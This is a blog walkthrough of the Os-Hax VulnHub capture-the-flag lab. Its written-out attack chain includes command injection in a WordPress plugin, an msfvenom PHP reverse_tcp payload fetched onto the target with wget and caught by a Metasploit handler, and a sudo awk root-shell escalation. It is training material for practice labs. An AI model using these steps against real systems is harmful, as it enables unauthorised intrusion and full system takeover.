Os-Hax Walkthrough vulnhub CTF

Today we are solving Os-Hax Walkthrough for and this CTF is designed by.. Rahul Gehlaut
Os-Hax walkthrough

You can download here. (Os-Hax Walkthrough)

Level: Intermediate

Boot to Root

Tool Used

  •  Netdiscover
  •  Dirb
  •  Nmap
  •  ExifTool
  •  Metasploit

Find of All IP  We did this using the Netdiscover command

Os-Hax walkthrough

we can continue to our second step that is scanning the target With Nmap Aggressive scan

nmap  -A

We found port 22, 80 Open HTTP

Type your machine IP in the web browser

Os-Hax walkthrough

Without wasting time enumerate the Directory

Enumerate the Directory With Dirb

Os-Hax walkthrough

And Found some directory  you will navigate to the following URL

And Find A Our First Flag

Os-Hax walkthrough

Now Download Image file flaghost.png

Data Exfiltration-Steganography

Now After Download the image Extract-Data Image

Os-Hax walkthrough

And Find Next Hint found a directory [email protected]

After Open the directory find the Flag2.txt

Open the file Flag2.txt

And Find Brain-Fuck Encode Code

And After Decode the Coad Find A WordPress Password

Decoder Website https://www.splitbrain.org/_static/ook/

Username: web

Password: [email protected]

            Next Step is Add a host file some Text

Vi /etc/hosts

After Add, My CTF IP and localhost Save the file

And Open Follow the URL Find a WordPress  Page


Without waste a time open the WordPress  login panel

Os-Hax walkthrough

And login with already found password

And after login WordPress Found a vulnerable Plugin Activity Manager

Os-Hax walkthrough

And open Activity Manager tool found a command injection

Let’s Check the command |id

And this is working after the command I see the output

Os-Hax walkthrough

After Check command injection work and create our payload with Metasploit

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4545 -f raw

open vi editor save the output text payload.php

create a Python Server

python -m SimpleHTTPServer

wget command download our payload target machine

Os-Hax walkthrough

First, remove maxlenght=15 to 100 inspect element | wget
Os-Hax walkthrough

Execute our payload this command | php payload.php

Os-Hax walkthrough
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost
set lport 4545

And got a reverse connection

Os-Hax walkthrough

First import python for proper shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’
Os-Hax walkthrough
Os-Hax walkthrough
cd /home
cd web

and I see our 3 flag

cat flag.txt

Privilege Escalation

For finding the 4th flag we need to escalate root privilege, let’s identify sudo rights for Alice with the help of the following command.

sudo -l

So here Alice can run awk as root without using the password and we can easily spawn root shell by exploiting this permission

sudo /user/bin/awk 'BEGIN {system("/bin/bash")}'
cd /root
cat final.txt
Os-Hax walkthrough

FLAG 4: COMPLETE! Congratulations

Author Name: Rahul Gehlaut see more blog here

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →